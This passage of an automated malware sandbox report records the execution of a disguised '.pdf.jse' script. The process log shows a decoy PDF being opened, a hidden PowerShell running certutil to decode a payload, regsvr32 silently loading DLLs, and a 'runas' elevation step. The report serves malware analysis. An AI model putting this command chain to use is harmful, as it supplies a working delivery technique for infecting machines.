        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DBF76C13_2_00007FF983DBF76C
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB475013_2_00007FF983DB4750
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DCC71413_2_00007FF983DCC714
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D9971013_2_00007FF983D99710
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB66E013_2_00007FF983DB66E0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD06F013_2_00007FF983DD06F0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DC85A013_2_00007FF983DC85A0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD757013_2_00007FF983DD7570
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DBF50413_2_00007FF983DBF504
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD84FC13_2_00007FF983DD84FC
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DDA4EC13_2_00007FF983DDA4EC
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DC8CB013_2_00007FF983DC8CB0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D9AB8013_2_00007FF983D9AB80
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD2B3C13_2_00007FF983DD2B3C
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DA0B3013_2_00007FF983DA0B30
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D989D013_2_00007FF983D989D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB599013_2_00007FF983DB5990
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DA794013_2_00007FF983DA7940
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D9695013_2_00007FF983D96950
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD48EC13_2_00007FF983DD48EC
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D9908013_2_00007FF983D99080
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D9505013_2_00007FF983D95050
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DA702013_2_00007FF983DA7020
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D99FE013_2_00007FF983D99FE0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DAAF6013_2_00007FF983DAAF60
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB4EF013_2_00007FF983DB4EF0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D9CEA013_2_00007FF983D9CEA0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DCCEAC13_2_00007FF983DCCEAC
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DDBE4C13_2_00007FF983DDBE4C
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DC8DD013_2_00007FF983DC8DD0
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD6D0813_2_00007FF983DD6D08
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DB7CFE13_2_00007FF983DB7CFE
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D98D1013_2_00007FF983D98D10
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D272C019_2_00007FF983D272C0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D279B019_2_00007FF983D279B0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D27EB019_2_00007FF983D27EB0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D184D019_2_00007FF983D184D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D0832019_2_00007FF983D08320
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D482F019_2_00007FF983D482F0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D422A419_2_00007FF983D422A4
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D3626019_2_00007FF983D36260
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D2116019_2_00007FF983D21160
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D4111019_2_00007FF983D41110
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D0A86019_2_00007FF983D0A860
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D3676C19_2_00007FF983D3676C
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D2F76C19_2_00007FF983D2F76C
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D2475019_2_00007FF983D24750
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D0971019_2_00007FF983D09710
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D3C71419_2_00007FF983D3C714
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D266E019_2_00007FF983D266E0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D406F019_2_00007FF983D406F0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D385A019_2_00007FF983D385A0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D4757019_2_00007FF983D47570
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D484FC19_2_00007FF983D484FC
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D2F50419_2_00007FF983D2F504
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D4A4EC19_2_00007FF983D4A4EC
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D38CB019_2_00007FF983D38CB0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D0AB8019_2_00007FF983D0AB80
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D42B3C19_2_00007FF983D42B3C
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D10B3019_2_00007FF983D10B30
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D089D019_2_00007FF983D089D0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D2599019_2_00007FF983D25990
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D1794019_2_00007FF983D17940
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D0695019_2_00007FF983D06950
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D448EC19_2_00007FF983D448EC
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D0908019_2_00007FF983D09080
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D1702019_2_00007FF983D17020
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D0505019_2_00007FF983D05050
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D09FE019_2_00007FF983D09FE0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D1AF6019_2_00007FF983D1AF60
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D24EF019_2_00007FF983D24EF0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D0CEA019_2_00007FF983D0CEA0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D3CEAC19_2_00007FF983D3CEAC
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D4BE4C19_2_00007FF983D4BE4C
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D38DD019_2_00007FF983D38DD0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D27CFE19_2_00007FF983D27CFE
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D46D0819_2_00007FF983D46D08
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D08D1019_2_00007FF983D08D10
        Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FF983DE3108 appears 41 times
        Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FF983D081A0 appears 101 times
        Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FF983D981A0 appears 101 times
        Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FF983D53108 appears 41 times
        Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FF983D1B2F0 appears 136 times
        Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FF983DAB2F0 appears 136 times
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DA0B30: GetVolumeInformationW,DeviceIoControl,CloseHandle,GetDriveTypeW,QueryDosDeviceW,SetupDiGetClassDevsW,SetupDiEnumDeviceInterfaces,SetupDiGetDeviceInterfaceDetailW,SetupDiGetDeviceInterfaceDetailW,DeviceIoControl,CloseHandle,SetupDiEnumDeviceInterfaces,SetupDiDestroyDeviceInfoList,CloseHandle,SetupDiDestroyDeviceInfoList,00007FF9AA922F90,13_2_00007FF983DA0B30
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
        Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jseVirustotal: Detection: 12%
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse'
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf'
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\ProgramData\ 2021-05-07.pdf'
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=83FD662E69ECF919D8944D885F919F9E --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --renderer-client-id=2 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job /prefetch:1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9a
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.bat
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C5CF.tmp.bat
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BC6E485E39BA42C7D01E94B3E9769F20 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BC6E485E39BA42C7D01E94B3E9769F20 --renderer-client-id=4 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job /prefetch:1
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=747A9B4378C4A9B7BB34D82AEF8DC480 --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=4DDA8CE3F3D37EB15CD09F11D5C7C42B --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=29BE366D42ABBCFC024ED1AE01B6F680 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf'Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9aJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9aJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\ProgramData\ 2021-05-07.pdf'Jump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9aJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=83FD662E69ECF919D8944D885F919F9E --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2Jump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context 